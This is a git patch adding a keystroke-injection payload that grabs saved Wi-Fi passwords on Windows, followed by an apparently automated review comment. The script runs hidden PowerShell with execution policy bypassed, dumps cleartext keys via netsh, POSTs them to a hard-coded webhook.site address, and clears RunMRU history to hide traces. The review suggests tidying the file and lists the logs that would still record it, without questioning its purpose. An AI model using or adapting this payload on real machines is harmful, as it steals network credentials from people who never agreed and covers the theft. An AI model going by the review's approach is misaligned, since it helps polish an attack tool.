From aa0c9e374d9d25fd0001120f42bf78fe4645aa3b Mon Sep 17 00:00:00 2001
From: 0x00 <53458032+Scrut1ny@users.noreply.github.com>
Date: Mon, 17 Oct 2022 00:50:47 -0400
Subject: [PATCH] Create Fast WiFi Exfil (Powershell - No RunMRU History)
---
... WiFi Exfil (Powershell - No RunMRU History) | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)
diff --git a/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History) b/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)
new file mode 100644
index 0000000..d4c9232
--- /dev/null
+++ b/payloads/library/exfiltration/WiFi_Passwd_Grab/Fast WiFi Exfil (Powershell - No RunMRU History)
@@ -0,0 +1,17 @@
+DELAY 1000
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass "function w{switch -r(netsh wl sh pr){':\s(.+)'{$s=$matches.1;switch -r(netsh wl sh pr n=$s k=clear){'tent.+:\s(.+)'{[PSCustomObject]@{SSID=$s;Pass=$matches.1}}}}}};$w=w;echo $w > $env:tmp\Wi-Fi-PASS"
+ENTER
+DELAY 100
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass Invoke-WebRequest -Uri https://webhook.site/ac411e28-1198-4cbd-851e-74aa9cb5a5d2 -Method POST -InFile $env:tmp\Wi-Fi-PASS;Remove-Item $env:tmp\Wi-Fi-PASS -Force -ErrorAction SilentlyContinue
+ENTER
+DELAY 100
+GUI r
+DELAY 200
+STRING powershell -w h -ep bypass Remove-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue
+ENTER
+DELAY 100
+EXIT
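Review bot: The second `STRING` line posts the recovered Wi-Fi keys to a hard-coded `webhook.site` bucket, so anyone who runs the file as committed sends cleartext credentials to a third-party endpoint they do not control; the URL should be a labelled placeholder such as `-Uri <COLLECTOR_URL>`, with a `REM` line saying it must be set before use. The file also has no `REM` header, and its name overstates what the last stage removes: it deletes only the `HKCU` RunMRU values. Where they are enabled, process-creation auditing (Event ID 4688, Sysmon Event ID 1), PowerShell script-block logging (Event ID 4104) and proxy or DNS logs would still record `powershell -w h -ep bypass`, the `netsh ... k=clear` calls and the outbound POST. I would add a header comment that says so, for example `REM Clears RunMRU only; command-line, script-block and network logs still record each stage.` The same header should note that the keys sit unencrypted in `$env:tmp\Wi-Fi-PASS` between the first and second stage and stay there if the second stage never runs.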